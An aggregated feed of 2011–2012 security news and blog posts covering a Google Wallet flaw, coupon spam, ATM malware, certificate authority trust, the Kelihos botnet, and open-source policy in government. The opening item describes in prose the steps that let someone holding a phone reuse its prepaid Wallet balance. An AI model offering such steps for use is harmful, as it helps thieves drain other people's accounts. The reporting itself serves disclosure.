Last week researchers found vulnerabilities in the Google Wallet payment system. The first vulnerability was found by Zvelo, which required root access. Rooting devices has become just short of trivial at this point with the availability of “one-click root” applications for most platforms. The vulnerability was leveraged to display the current PIN number. The very next day a new vulnerability was discovered in how application data is handled in the Wallet app. In this case no root access is needed, as thesmartphonechamp demonstrated , this is simply a flaw in how the application works. Assuming a Google Prepaid card has been set up, a user can navigate to the application management interface, and delete application data for Google Wallet. On return to the app’s interface, the user is then prompted to set up a new PIN. The flaw is that the Google Prepaid card data persists. After establishing a new PIN number, the attacker is free to use the prepaid card as though it was their own.

Channel Image09:15 Valentine’s coupon» Securelist / Blog

It may not be in the same league as Christmas and New Year, but with every year Valentine’s Day is being exploited more and more by spammers. In the week before it is celebrated this year Valentine’s spam accounted for 0.3% of all spam.

We registered the first Valentine’s spam as far back as 14 January - a whole month before the holiday itself - and it struck us as being rather unusual.

Like the majority of spam mass mailings exploiting the Valentine’s Day theme, this particular mailing was in English. It is a well-known fact that the lion’s share of English-language spam is distributed via partner programs. (Unlike other parts of the world, the practice of small and medium-sized companies ordering spam mailings or sending out spam themselves is not very popular in the USA and most western European countries.) However, the first Valentine’s spam of the year bucked this trend and had nothing to do with a partner program.

This particular offer for Valentine’s Day gifts made use of coupon services.

As you can see from the screenshot, the recipient is urged to buy a small gift for their loved one making use of a discount, an offer which the company made via the major coupon service Groupon.

Coupon services have proved to be a big success around the world. Every day various websites offer special deals on anything from two to several dozen goods or services.

Groupon is one of the biggest Internet projects of its kind and it’s fairly easy to find its promo campaigns online. The site also informs its subscribers about new deals via email. The company that sent out the first Valentine’s spam detected by Kaspersky Lab used an advert for this major portal, the legitimate Groupon email campaign plus spam advertising.

We’ve already noted that for small companies coupon services are fast becoming a credible alternative to spam advertising. Judge for yourself: the method used to spread adverts is the same - via email, but spam filters don’t block legitimate mailings from major Internet resources. Another important advantage is that the firms that offer coupon services are not breaking the law. The size of the mailing may well be less than a spam mailing that a company could order, but the legitimate mailing is sent out to the relevant region and the recipients are genuinely interested in special offers sent by coupon services. As a result, a targeted, legitimate mailing can be more effective than the typical ‘carpet bombing’ associated with traditional spam.

Coupon services have had a noticeable impact on mail traffic and Internet advertising. They have also affected spam. There are now a number of spam categories associated with coupon services.

The first is that of unsolicited mailings by the services themselves. This category of spam is quite rare - the more serious companies don’t want to tarnish their reputation by being associated with spam. However, some start-ups trying to break in to the market are willing to resort to spam in an attempt to attract subscribers or to allow their platforms to be used for promotions by other companies.

Another category of ‘coupon’ spam is that which simply uses the word “coupons” instead of “discounts” to make goods or services more attractive to users. These spam mailings can offer ‘coupons’ for some of the most unexpected items. For instance, the people behind pharmaceutical spam think nothing of offering a small discount on medications and passing it off as a coupon.

A third category of coupon spam includes things like the Valentine’s spam mentioned above. This involves a company whose offers are already available via a coupon service attempting to reach a wider audience by resorting to spam. As I see it, this approach is counterproductive. The majority of users react negatively to spam, and using it to advertise will only do harm to a company’s reputation. This is especially important as many coupon services rely on the trust of their users. Spam, therefore, can actually work against a coupon service, reducing the effect of a promotion instead of enhancing it.

The potential popularity of coupon services carries with it a specific threat. Users of the services tend to leave some money on their account balance so they can spend it at any time on a deal that takes their fancy. Although the amount of money stored on such accounts may not be very much, it is still likely to attract phishing attacks against the customers of coupon services.

So as not to play into the spammers’ hands, or to avoid falling victim to a phishing attack, when using these coupon services, users need to follow three simple rules:

  1. Don’t open emails from coupon services that you haven’t registered with. On the one hand, this secures you against phishing attacks or mail traffic containing malicious code. On the other hand, if a spammer’s email turns out to be simply a commercial offer, you reduce the number of responses, making the spammers’ work less profitable.
  2. If an email from a coupon service to which you are registered asks you to verify your account via a link, or to enter your login and password in some other way, do not under any circumstances do so. Remember that large organizations never ask you to send your login and password via email. Any such request should be seen as an attempt to steal your account. If you are in any doubt as to whether a message is fraudulent, it is best to enter the service’s website using the method that you normally use, e.g. by entering the address in the address bar of the browser or selecting it from a ‘favorites’ tab. Only when you have opened the site and are certain that it is genuine should you open your account and make sure there are no problems with it.
  3. If you get a message from a major service about coupons that you didn’t order, don’t open the message and, more importantly, don’t download any attachments that came with the email.

Coupon services often send purchased coupons as an attachment in an email. If you have not purchased any coupons from the service, there’s a chance that an email attachment might be malicious. If you are not sure whether or not you bought the coupon, you can always check by entering your account. We have not yet detected a malicious attachment disguised as a coupon. Nevertheless, we recommend that users be careful - spammers that participate in partner programs are usually the first to react to new opportunities, including those that involve spreading malicious code. It’s just a matter of time before this type of spam traffic appears.

Mon 13 February, 2012

Channel Image13:41 Google Webmaster Tools : ajout de sites et exploration des sitemaps incompatibles avec IPv6» Denis Szalkowski Formateur Consultant
Google et Bing Webmaster Tools incompatibles IPv6Google Webmaster Tools ne prend pas en charge les sites à partir de leur adresse IPv6. Quant à l'indexation de sitemaps contenant des adresses IPv6, elle retourne des erreurs ! Pour Bing Webmaster Tools, c'est pas mieux.

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image06:00 Ubuntu 11.10 Review: Benchmarked Against Windows 7» Reviews Tom's Hardware US
Ubuntu 11.10 Review: Benchmarked Against Windows 7Three months have passed since the latest version of Ubuntu launched. With its classic desktop gone, Oneiric Ocelot is all Unity. The training wheels are off; no turning back now. Is Ubuntu ready for touchscreens? And how does it compare to Windows 7?

Fri 10 February, 2012

Channel Image21:31 The ‘Chupa Cabra’ malware: attacks on payment devices» Securelist / Blog

You’ve probably already heard about the 'Chupa Cabra', literally a "goat sucker". It’s a mythical beast rumored to inhabit parts of the Americas. In recent times it has been allegedly spotted in Puerto Rico (where it was first reported), Mexico and the United States, especially in the latter’s Latin American communities. The name Chupa Cabra has also been adopted by Brazilian carders to name skimmer devices, installed on ATMs. They use this name because the Chupa Cabra will “suck” the information from the victim’s credit card.

The Brazilian media regularly shows videos of bad guys installing their Chupa Cabra onto an ATM. Some of them are unlucky, or incompetent, and get picked up on security cameras and caught by the cops.

That’s what makes installing an ATM skimmer a risky business - and that’s why Brazilian carders have joined forces with local coders to develop an easier, more secure way to steal and clone credit card information. From this unholy alliance, the ‘Chupa Cabra’ malware was born.

Thu 09 February, 2012

Channel Image23:25 When Certificate Authority Business Models and Vendor Certificate Policies Clash» Securelist / Blog

A very important “internet trust” discussion is underway that has been hidden behind closed doors for years and in part, still is. While the Comodo , Diginotar, and Verisign Certificate Authority breaches forced discussion and action into the open, this time, this “dissolution of trust” discussion trigger seems to have been volunteered by Trustwave's policy clarification, and followup discussions on Mozilla's bugzilla tracking and mozilla.dev.security.policy .

The issue at hand is the willful issuance of subordinate CAs from trusted roots for 'managing encrypted traffic', used for MitM eavesdropping, or wiretapping, of SSL/TLS encrypted communications. In other words, individuals attempting to communicate over twitter, gmail, facebook, their banking website, and other sensitive sites with their browser may have their secure communications unknowingly sniffed - even their browser or applications are fooled. An active marketplace of hardware devices has been developed and built up around tapping these communications. In certain lawful situations, this may be argued as legitimate, as with certain known DLP solutions within corporations. But even then, there are other ways for corporate organizations to implement DLP. Why even have CA's if their trust is so easily co-opted? And the arbitrary issuance of these certificates without proper oversight or auditing in light of browser (and other software implemented in many servers and on desktops, like NSS ) vendor policies is at the heart of the matter. Should browser, OS and server software vendors continue to extend trust to these Certificate Authorities when the CA’s activities conflict with the software vendors’ CA policies?

Wed 08 February, 2012

Channel Image16:12 Are Mobile Advertisers Getting Too Aggressive?» Securelist / Blog

Many of the apps we enjoy are free. Well, to call them free is a bit misleading. You pay for the apps by looking at advertisements. This is a platform we should all recognize from the sidebar of Facebook, or Google, or almost any service that doesn’t charge a premium to use it. Advertising has paved the way for many services to gather a huge audience audience and still profit.

On Android and in many cases iOS, the advertisers have gotten very aggressive. They now collect all kinds of data through multiple forms of advertising. I’d like to take a look now at what you can expect.

Tue 07 February, 2012

Channel Image20:46 Adobe Incubates Flash Runtime for Firefox» Securelist / Blog

The Adobe AIR and Adobe Flash Player Incubator program updated their Flash Platform runtime beta program to version 5, delivered as Flash Player version 11.2.300.130. It includes a "sandboxed" version of the 32-bit Flash Player they are calling "Protected Mode for Mozilla Firefox on Windows 7 and Windows Vista systems". It has been over a year since Adobe discussed the Internet Explorer ActiveX Protected Mode version release on their ASSET blog, and the version running on Google Chrome was sandboxed too.

Adobe is building on the successes that they have seen in their Adobe Reader X software. Its sandbox technology has substantially raised the bar for driving up the costs of "offensive research", resulting in a dearth of Itw exploits on Reader X. As in "none" in 2011. This trend reflects 2011 targeted attack activity that we’ve observed. 2011 APT related attacks nailed outdated versions of Adobe Flash software delivered as "authplay.dll" in Adobe Reader v8.x and v9.x and the general Flash component "NPSWF32.dll" used by older versions of Microsoft Office and other applications. Adobe X just wasn't hit. IE Protected Mode wasn't hit. Chrome sandboxed Flash wasn't hit. If there are incident handlers out there that saw a different story, please let me know.

Channel Image15:53 Malicious ads on security websites» Securelist / Blog
    Perhaps the worst possible scenario is when a bank website is hosting malicious ads: you never know what can be installed and when on your computer if you click on the ad banners. Something similar happens with security websites hosting malicious ads. They are supposed to be for security information. The people browsing such sites trust the content to be safe, but in actual fact because of the ad banners the resources may be anything but trustworthy.

Mon 06 February, 2012

Channel Image16:21 Will Google Bouncer definitely remove all malware from the Android Market?» Securelist / Blog
Will the Bouncer be effective in addressing the malware problems with Android apps? First of all, this is a good and really necessary move Google is taking, however the solution will be only partial. Based on the public information around this service, all apps will be scanned for known malware. Basically that means a multi-scanner or something similar will be used, so the quality of malware detection will depend greatly on what AV engines Google will use to analyze apps. Not all AV engines have the same quality, so there is a possibility some malicious apps won't be detected as malicious. The second step offered by Google is emulation. It's a good approach, however it can also be cheated by anti-emulation tricks or a malicious app can be programmed to behave differently once an emulation is detected, making the app appear to be non-threatening.  So, basically the same malware tricks used to bypass Windows security can be implemented now on Android.
Is it still a good idea to use a mobile security program for protection even with Bouncer in place? Yes, for sure it's a good idea. The situation is many people download apps not only from the official Android Market, but also from third-party sources.  Nobody knows for certain what kind of apps are out there on private market stores, run by people not affiliated with Google. Additionally as we mentioned if Google's multi-scanner won't count on all AV engines but only some of them, it's certainly good to use AV detection on your phone as a second opinion for anything that might have slipped past Google’s scanner.
Are there ways for hackers to sneak infected apps into the store despite Bouncer? Yes and one of them is by hacking well known and trustful developers accounts. In fact I believe that will happen in the near feature. I say this because of Google says it will check all new developers account. If a developer is already known and trusted by Google, that developer account will be a prime target for cybercriminals. Also, even though we haven’t seen it happen yet, we know cybercriminals can start developing apps that work differently in specific geographic zones. For example, an app could be designed to only behave maliciously if it detects a Latin American carrier…if the same app is used by a US carrier, no malicious behavior will be detected. That's also an anti-emulation trick which can be exploited by cybercriminals in order to avoid Bouncer detection.
Channel Image02:05 New Hampshire: Open source, open standards, open data» David A. Wheeler's Blog

The U.S. state of New Hampshire just passed act HB418 (2012), which requires state agencies to consider open source software, promotes the use of open data formats, and requires the commissioner of information technology (IT) to develop an open government data policy. Slashdot has a posted discussion about it. This looks really great, and it looks like a bill that other states might want to emulate. My congrats go to Seth Cohn (the primary author) and the many others who made this happen. In this post I’ll walk through some of its key points on open source software, open standards for data formats, and open government data.

First, here’s what it says about open source software (OSS): “For all software acquisitions, each state agency… shall… Consider whether proprietary or open source software offers the most cost effective software solution for the agency, based on consideration of all associated acquisition, support, maintenance, and training costs…”. Notice that this law does not mandate that the state government must always use OSS. Instead, it simply requires government agencies to consider OSS. You’d think this would be useless, but you’d be wrong. Fairly considering OSS is still remarkably hard to do in many government agencies, so having a law or regulation clearly declare this is very valuable. Yes, closed-minded people can claim they “considered” OSS and paper over their biases, but laws like this make it easier for OSS to get a fair hearing. The law defines “open source software” (OSS) in a way consistent with its usual technical definition, indeed, this law’s definition looks a lot like the free software definition. That’s a good thing; the impact of laws and regulations is often controlled by their definitions, so having good definitions (like this one for OSS) is really important. Here’s the New Hampshire definition of OSS, which I think is a good one:

  1. ”Unrestricted use of the software for any purpose;
  2. Unrestricted access to the respective source code;
  3. Exhaustive inspection of the working mechanisms of the software;
  4. Use of the internal mechanisms and arbitrary portions of the software, to adapt them to the needs of the user;
  5. Freedom to make and distribute copies of the software; and
  6. Modification of the software and freedom to distribute modifications of the new resulting software, under the same license as the original software.”

The material on open standards for data says, “The commissioner shall assist state agencies in the purchase or creation of data processing devices or systems that comply with open standards for the accessing, storing, or transferring of data…” The definition is interesting, too; it defines an “open standard” as a specification “for the encoding and transfer of computer data” that meets a long list of requirements, including that it is “Is free for all to implement and use in perpetuity, with no royalty or fee” and that it “Has no restrictions on the use of data stored in the format”. The list is actually much longer; it’s clear that the authors were trying to counter common vendor tricks who try to create “open” standards that really aren’t. I think it would have been great if they had adopted the more stringent Digistan definition of open standard, but this is still a great step forward.

Finally, it talks about open government data, e.g., it requires that “The commissioner shall develop a statewide information policy based on the following principles of open government data”. This may be one of the most important parts of the bill, because it establishes these as the open data principles:

  1. ”Complete. All public data is made available, unless subject to valid privacy, security, or privilege limitations.
  2. Primary. Data is collected at the source, with the highest possible level of granularity, rather than in aggregate or modified forms.
  3. Timely. Data is made available as quickly as necessary to preserve the value of the data.
  4. Accessible. Data is available to the widest range of users for the widest range of purposes.
  5. Machine processable. Data is reasonably structured to allow automated processing.
  6. Nondiscriminatory. Data is available to anyone, with no requirement of registration.
  7. Nonproprietary. Data is available in a format over which no entity has exclusive control, with the exception of national or international published standards.
  8. License-free. Data is not subject to any copyright, patent, trademark, or trade secret regulation. Reasonable privacy, security, and privilege restrictions may be allowed.”

The official motto of the U.S. state of New Hampshire is “Live Free or Die”. Looks like they truly do mean to live free.

Thu 02 February, 2012

Channel Image13:15 Lab Matters - The death of browser trust» Securelist / Blog

In this webcast, Kaspersky Lab senior security researcher Roel Schouwenberg talks about the Diginotar certificate authority breach and the implications for trust on the Internet. Schouwenberg also provides a key suggestion for all major Web browser vendors.

Tue 31 January, 2012

Channel Image12:00 Kelihos/Hlux botnet returns with new techniques» Securelist / Blog

It has been four months since Microsoft and Kaspersky Lab announced the disruption of Kelihos/Hlux botnet. The sinkholing method that was used has its advantages - it is possible to disable a botnet rather quickly without taking control over the infrastructure.However,as this particular case showed, it is not very effective if the botnet’s masters are still at large.

Not long after we disrupted Kehilos/Hlux, we came across new samples that seemed to be very similar to the initial version. After some investigation, we gathered all the differences between the two versions. This is a summary of our findings:

Let’s start with the lowest layer, the encryption and packing of Kelihos/Hlux messages in the communication protocol. For some reason, in the new version, the order of operations was changed. Here are the steps of processing an encrypted data for retrieving a job message which is organized as a tree structure:

Old Hlux New Hlux
1 Blowfish with key1 Blowfish with new key1
2 3DES with key2 Decompression with Zlib
3 Blowfish with key3 3DES with new key2
4 Decompression with Zlib Blowfish with new key3

Fri 27 January, 2012

Channel Image18:44 CVE-2012-0003 Exploit ITW» Securelist / Blog

S. Korean handlers are slow to take down the publicly distributed malicious code exploiting CVE-2012-0003, a vulnerability patched in Microsoft's January 2012 patch release MS12-004. We have discussed with reporters that the code has been available since the 21st, and a site appears to have been publicly attacking very low numbers of Korean users over the past day or so. The site remains up at this time.

Fri 20 January, 2012

Channel Image19:27 Website back up» David A. Wheeler's Blog

This website (www.dwheeler.com) was down part of the day yesterday due to a mistake made by my web hosting company. Sorry about that. It’s back up, obviously.

For those who are curious what happened, here’s the scoop. My hosting provider (WebHostGiant) moved my site to a new improved computer. By itself, that’s great. That new computer has a different IP address (the old one was 207.55.250.19, the new one is 208.86.184.80). That’d be fine too, except they didn’t tell me that they were changing my site’s IP address, nor did they forward the old IP address. The mistake is that the web hosting company should have notified me of this change, ahead of time, but they failed to do so. As a result, I didn’t change my site’s DNS entries (which I control) to point to its new location; I didn’t even know that I should, or what the new values would be. My provider didn’t even warn me ahead of time that anything like this was going to happen… if they had, I could have at least changed the DNS timeouts so the changeover would have been quick.

Now to their credit, once I put in a trouble ticket (#350465), Alex Prokhorenko (of WebhostGIANT Support Services) responded promptly, and explained what happened so clearly that it was easy for me to fix things. I appreciate that they’re upgrading the server hardware, I understand that IP addresses sometimes much change, and I appreciate their low prices. In fact, I’ve been generally happy with them.

But if you’re a hosting provider, you need to tell the customer if some change you make will make your customer’s entire site unavailable without the customer taking some action! A simple email ahead-of-time would have eliminated the whole problem.

Grumble grumble.

I did post a rant against SOPA and PIPA the day before, but I’m quite confident that this outage was unrelated.

Anyway, I’m back up.

Channel Image14:20 Brazilian cybercriminals’ daily earnings - more than you’ll ever earn in a year!» Securelist / Blog
    How much do you earn per day? If we look at how much a cybercriminal from Brazil earns every day, we’ll understand why Brazil is one of the main sources of malware in the world. Brazilian cybercriminals really like to use short URLs to track infections and have their own stats. Here is the profile of one criminal using Bitly as a URL shortening service.

Thu 19 January, 2012

Channel Image16:42 Malware wallpaper calendars for 2012» Securelist / Blog

As some of you may remember, during 2011 we published a malware calendar wallpaper for each month of the year.

We're doing so again this year, with updated information from 2011. However, we've decided to take a slightly different approach this year and publish all 12 wallpapers in one place. You can find them all here.

We hope you like this year's designs and find the data interesting.

Channel Image14:35 Lab Matters - The threat from P2P botnets» Securelist / Blog

Kaspersky Lab malware researcher Tillmann Werner joins Ryan Naraine to talk about the threat from peer-to-peer botnets. The discussions range from botnet-takedown activities and the ongoing cat-and-mouse games to cope with the botnet menace.

Wed 18 January, 2012

Channel Image11:06 Stop SOPA and PIPA» David A. Wheeler's Blog

Please protest the proposed STOP (Stop Online Piracy Act) and PIPA (PROTECT IP Act). The English Wikipedia is blacked out today, and many other websites (like Google) are trying to awareness of these hideous proposed laws. The EFF has more information about PIPA and SOPA. Yes, the U.S. House has temporarily suspended its work, but that is just temporary; it needs to be clear that such egregious laws must never be accepted.

Wikimedia Foundation board member Kat Walsh puts it very well: “We [the Wikimedia Foundation and its project participants] depend on a legal infrastructure that makes it possible for us to operate. And we depend on a legal infrastructure that also allows other sites to host user-contributed material, both information and expression. For the most part, Wikimedia projects are organizing and summarizing and collecting the world’s knowledge. We’re putting it in context, and showing people how to make sense of it. But that knowledge has to be published somewhere for anyone to find and use it. Where it can be censored without due process, it hurts the speaker, the public, and Wikimedia. Where you can only speak if you have sufficient resources to fight legal challenges, or, if your views are pre-approved by someone who does, the same narrow set of ideas already popular will continue to be all anyone has meaningful access to.”

Wed 21 December, 2011

Channel Image20:33 U.S. Department of Defense Removes Open Source Software Roadblocks (AppDev STIG)» David A. Wheeler's Blog

The U.S. Department of Defense (DoD) has changed one of its key software development documents, making it even clearer that it’s okay to use open source software (OSS) in the DoD. This is good news beyond the DoD; if the US DoD can widely accept OSS, then maybe other organizations (that you deal with) can too.

That key document has the long title “Application Security & Development (AppDev) Security Technical Implementation Guide (STIG),” aka the AppDev STIG.  The AppDev STIG includes some guidelines for how to write secure software, and a checklist for use before you can deploy custom software in certain cases. In the past, many people thought that using OSS in the DoD required special permission, because they misunderstood some of DoD’s policies, and this misunderstanding had crept into the AppDev STIG.  The good news is that this has been fixed.

Here’s the basic background.

Open source software (OSS) is software where anyone can read, modify, and redistribute the source code (its “blueprints”) in original or modified form.  OSS is widely used and developed in industry; some popular OSS includes the Linux kernel (the basis of Google’s Android), the Firefox web browser, and Apache (the world’s most popular web server).  You can get quantitative numbers about OSS at http://www.dwheeler.com/oss_fs_why.html.  There is a lot of high-quality OSS, and OSS is often very inexpensive even when you include installation, training, and so on.

Unfortunately, previous versions of the AppDev STIG were often interpreted as saying that using OSS required special permission.  This document matters; DoD Directive (DoDD) 8500.01E requires that “all IA and IA-enabled IT products incorporated into DoD information systems shall be configured in accordance with DoD-approved security configuration guidelines” and tasks DISA to develop the STIGs.  It’s often difficult to get systems fielded unless they meet the STIGs.

AppDev STIG version 3 revision 1 (an older version) said:

(APP2090.1: CAT II) “The Program Manager will obtain DAA acceptance of risk for all open source, public domain, shareware, freeware, and other software products/libraries with no warranty and no source code review capability, but are required for mission accomplishment.”

(APP2090.2: CAT II): “The Designer will document for DAA approval all open source, public domain, shareware, freeware, and other software products/libraries with limited or no warranty, but are required for mission accomplishment.”

Many people interpreted this as saying that any use of OSS required special permission.  But where would the Defense Information Systems Agency (DISA), the author of the AppDev STIG, get that idea?  Well, it turns out that this is a common misunderstanding of DoD policy.  DoD Instruction 8500.2, February 6, 2003 has a control called “DCPD-1 Public Domain Software Controls” (http://www.dtic.mil/whs/directives/corres/pdf/850002p.pdf), which starts with this text:

Binary or machine executable public domain software products and other software products with limited or no warranty such as those commonly known as freeware or shareware are not used in DoD information systems unless they are necessary for mission accomplishment and there are no alternative IT solutions available.

A lot of people stopped reading there; they saw that “freeware” required special permission, and since OSS can often be downloaded for free, they presumed that all OSS was “freeware.”  They should have kept reading, because it then goes on to make it clear that OSS is not freeware:

Such products are assessed for information assurance impacts, and approved for use by the DAA. The assessment addresses the fact that such software products are difficult or impossible to review, repair, or extend, given that the Government does not have access to the original source code and there is no owner who could make such repairs on behalf of the Government…

This latter part makes it clear that software only requires special treatment if the government cannot review, repair, or extend the software.  If the government can do these things, there’s no problem, and by definition OSS provides these rights.  But a lot of people didn’t understand this.

This was such a common misunderstanding that in October 2009, the DoD CIO’s memo “Clarifying Guidance Regarding Open Source Software (OSS)” specifically stated (in Attachment 2, 2c) that this was a misunderstanding (http://dodcio.defense.gov/sites/oss/2009OSS.pdf).  The DoD CIO later instructed DISA to update the AppDev STIG so this misunderstanding would be removed.

The latest AppDev STIG (Version 3, Release 4) has just fixed this (http://iase.disa.mil/stigs/app_security/app_sec/app_sec.html).  The new STIG:

  1. Refers to the DoD OSS policy of 2009, instead of the old one.
  2. Has better definitions for software types, including “OSS” and “commercial software”.  Its old definitions caused problems for OSS use; the “commercial software” definition was even inconsistent with US law, the Federal Acquisition Regulation (FAR), and the DoD FAR Supplement (DFARS).  In particular, it makes it clear that most OSS is commercial software as defined by law and regulation.
  3. Makes it clear that special DAA approval is ONLY required if BOTH of the following are true:  “(1) no source code to review, repair, and extend, and (2) limited or no warranty, but are required for mission accomplishment.”  See checklist items (APP2090.1: CAT II) and (APP2090.2: CAT II).  This is the big change.

Two related points:

  1. Sadly, the AppDev STIG latest revision has a formatting glitch; all second-level headings aren’t numbered in the body, with the result that the table-of-contents numbers don’t match the body.  Still, it has the updated technical content, and future versions will presumably fix the formatting.
  2. The wording of DoDI 8500.2’s DCPD-1 has been confusing people for years (I hear that at least parts of NASA have also used this text, inheriting the same confusion).  In the short term, the DoD CIO’s formal clarification should help.  In the longer term, there is an effort to switch the DoD to a single set of federal information assurance controls defined in NIST Special Publication 800-53.  Its equivalent control, SA-6(1), has much clearer text.

But the editorial gaff in the AppDev STIG, and the work on improving the wording of controls long term, shouldn’t detract from the main point.

The main point is:

Open Source Software (OSS) is now much easier to use in the DoD.

Sun 06 November, 2011

Channel Image13:45 Open Source Award!» David A. Wheeler's Blog

I’ve learned that Open Source for America (OSFA) has awarded me a 2011 Open Source Award - Individual Award for my work to advocate consideration of “open source software in the US Department of Defense (DoD)”. They specifically point to my papers Why Open Source Software / Free Software? Look at the Numbers! and Nearly all FLOSS is Commercial.

The winners of all the 2011 awards were:

  • Open Source Deployment in Government: (DHS) Science and Technology (S&T) Directorate‘s Homeland Open Security Technology (HOST) program. (I’m involved in this, too.)
  • Open Source Project: Open Source Geospatial Foundation (OSGeo) for its OpenLayers web mapping project.
  • Individual Awards: David A. Wheeler (me) and Melanie Chernoff

Thanks so much, OSFA! I’m honored.

Thu 27 October, 2011

Channel Image19:52 SEO Advice (from a non-expert!)» scriptygoddess
I know it's in the title, but I'll say it again. I'm NOT an SEO expert. I don't even pretend to be one on TV or anywhere else. But I've been working on websites specifically for about 13 or 14 years, so I guess I've probably learned a few things along the way. Maybe this [...] No related posts. Related posts brought to you by Yet Another Related Posts Plugin.

Wed 26 October, 2011

Channel Image21:40 Disappearing absolute positioned elements in IE7» scriptygoddess
With IE6 nearly dead (although according to Microsoft – as of this writing, 9% of users worldwide still have this P.O.S. browser on their machines which, if you go by w3school's stats, is more than Safari's usage. Then again, w3schools has ie6 pinned at around 1% so maybe there's still hope) Or not. IE7 and [...] Related posts:
  1. The mysteriously disappearing WordPress 3.1 Admin Bar I've run into this problem a few times now and...
Related posts brought to you by Yet Another Related Posts Plugin.

Thu 13 October, 2011

Channel Image07:18 WordPress Objects» scriptygoddess
For some custom templates, I need to get information from various WordPress objects, either relating to the current page, or from elsewhere in the site. The best way to do that is to get the object in a variable then do a print_r($objectvar) to see all the information included with that object. Even though I [...] No related posts. Related posts brought to you by Yet Another Related Posts Plugin.

Tue 04 October, 2011

Channel Image14:59 Open Document Format 1.2 approved!» David A. Wheeler's Blog

Hooray! Open Document Format for Office Applications (ODF or OpenDocument) Version 1.2 has been approved as an OASIS Standard. Finally, the world has a standard vendor-independent format for storing and exchanging ordinary office documents (particularly word processing documents, spreadsheets, and presentations) that you can edit.

Historically, people have only been able to exchange these documents if they use the same program, locking users into specific vendor products. In short, users often don’t really own the documents they create; they are often beholden to the developers of their tools. This is especially nasty for government documents; all governments have to choose some product, and whatever product they use implicitly forces their citizens to use the same product (whether they want to or not). Over time these documents can no longer be read, as products are upgraded or people change products, so this is also a disaster for archiving. We can read the Magna Carta more easily than some documents saved 30 years ago. Heck, we can read Sumerian writings more easily than some documents saved 30 years ago, and that is a scary thing. ODF provides us the possibility of actually exchanging documents, and reading archives, regardless of what program was used to create them. In short, people now have real freedom when they create and exchange normal office documents — they are no longer locked into a particular supplier or version of program.

Rob Weir has some of the highlights of version 1.2, and he has also written an overview of ODF.

For me, the highlight is OpenFormula. Previous versions of the specification could exchange spreadsheets, but did not standardize the format of recalculated formulas. I led the subcommittee in the ODF Technical Committee to nail down exactly how to recalculate formulas. The result: We now have a real spec. My sincere thanks to the many who helped make this possible. Feel free to see my 2011-05-28 post about the success of OpenFormula.

I’m sure that there will continue to be refinements for years to come; that is normal for a standard. In some sense this is after the fact; like many good standards, it was developed through the cooperation of many of the implementors. It is already implemented, at least in part, in many places, and I expect even more completed implementations soon.

The key, though, is that users can finally own the documents they create. That is a major step forward, for all of us.

Fri 30 September, 2011

Channel Image11:49 Petition the White House to cease issuing software patents» David A. Wheeler's Blog

I encourage all US citizens to sign this petition to the US White House to “direct the patent office to cease issuing software patents”. I believe software patents impede innovation (instead of helping it), and they have become a threat to the US economy. Many organizations involved in software are now spending lots of time fending off patent trolls, fighting patent lawsuits, or cannot safely solve problems due to patent thickets. The recently-passed “America Invents Act” (AIA) completely failed to deal with this fundamental problem.

Signing a petition won’t immediately solve anything. That’s not how it works. But repeatedly making the government aware that there’s a real problem is a good first step to solving a problem. In the US, the right of the people to petition their government is guaranteed by the first amendment of the US Constitution (“Congress shall make no law …. abridging… the right of the people peaceably to assemble, and to petition the Government for a redress of grievances”). Everyone is affected today by software, and so far the government has not effectively dealt with the problem. Please use this opportunity to make the government aware of a real problem.

Fri 16 September, 2011

Channel Image20:04 Off-the-Shelf (OTS) Software Maintenance Strategies» David A. Wheeler's Blog

Off-the-shelf (OTS) software is simply software that is ready-made and available for use. Even when you need a custom system, building it from many OTS components has many advantages, which is why everyone does it. OTS works because you can save money and time, increase quality, and increase innovation through resource pooling.

However, people can get easily confused by the many different ways that off-the-shelf (OTS) software can be maintained. Terminology varies, and there hasn’t been an obvious way to describe how these different approaches are related. In 2010 I chatted with several others about how to make this clearer, and then created a picture that I think clarifies things. My thanks to helpful critiques from Heather Burke and John Scott. So here’s the picture, followed by a discussion on what it means.


Off-the-Shelf (OTS) Maintenance Strategies

If OTS software is commercial, it’s commercial OTS (COTS) software. By U.S. law, any software is commercial if it is (1) sold, licensed, or leased to the public, and (2) has a non-governmental use. There are two kinds of COTS software: Open Source Software (OSS) and proprietary software. OSS, put briefly, is software whose licenses give users the freedom to run the program for any purpose, to study and modify the program, and to redistribute copies of either the original or modified program (without having to pay royalties to previous developers). Yes, practically all OSS is commercial.

OTS can also be retained and maintained internally by an organization. For example, the U.S. government develops and maintains some software internally. In the U.S. government world, such software often called government OTS (GOTS). This figure shows things from the point of view of the U.S. government, but if you work with some other organization, you can think of this figure with your organization in the place of the U.S. government. (Maybe this should be called “internal off-the-shelf” or “IOTS” instead!) The idea here is that any organization can have software that it controls internally, and view as internal OTS software, as well as the COTS software that is available to the public.

There are various reasons why the government should sometimes keep certain software in-house, e.g., because sole possession of the software gives the U.S. a distinct advantage over its adversaries. However, there is also considerable risk to the government if it tries to privately hold GOTS software within the government for too long. Technological advantage is usually fleeting. Often there is a commercially-developed item available to the public that begins to perform similar functions. As it matures, other organizations begin using this non-GOTS solution, potentially rendering the GOTS solution obsolete. Such cases often impose difficult decisions, as the government must determine if it will pay the heavy asymmetrical cost to switch, or if it will continue “as usual” with its now-obsolete GOTS systems (with high annual costs and limitations that may risk lives or missions).

Either COTS or GOTS may be maintained by a single maintainer or by a community. In community maintenance there is often a single organization who determines if proposals should be accepted, but the key here is that the work tends to be distributed among those affected. An Open GOTS (OGOTS) project is a GOTS project which uses multiple-organization collaborative development approaches to develop and maintain software, in a manner similar to OSS. Some people use the term “Government Open Source Software” (GOSS) instead of OGOTS (in particular, GOSS for Govies uses the term GOSS instead).

GOTS (including OGOTS) is basically a special case of “gated software” with development inside a government. However, governments are bigger than most companies, and (in democracies) they are supposed to serve all of their citizenry, and those factors make them rather different than most other gated communities. Community development of proprietary software (“gated software”) outside governments is less common, but it can happen (historically some parts of Unix were developed this way). The term Open Technology Development (OTD) involves community development among government users (in the case of government developers), and thus it includes both OSS and OGOTS (aka GOSS).

I should note that I have a broad view of maintenance. I’ve often said that there is only one program — “Hello, World” — and that the rest is maintenance. That’s overstated for effect, but I believe there is a lot of truth in that statement.

This figure, and some of the text above, is in section 1.3 of the paper Open Technology Development (OTD): Lessons Learned & Best Practices for Military Software (also available via MIL-OSS), which is released under the Creative Commons BY-SA license. If you’re interested in more, please see the paper! The figure and some of the text are also part of “Software is a Renewable Military Resource” by John Scott, Dr. David A. Wheeler, Mark Lucas, and J.C. Herz, Journal of Software Technology, February 2011, Vol. 14, Number 1.

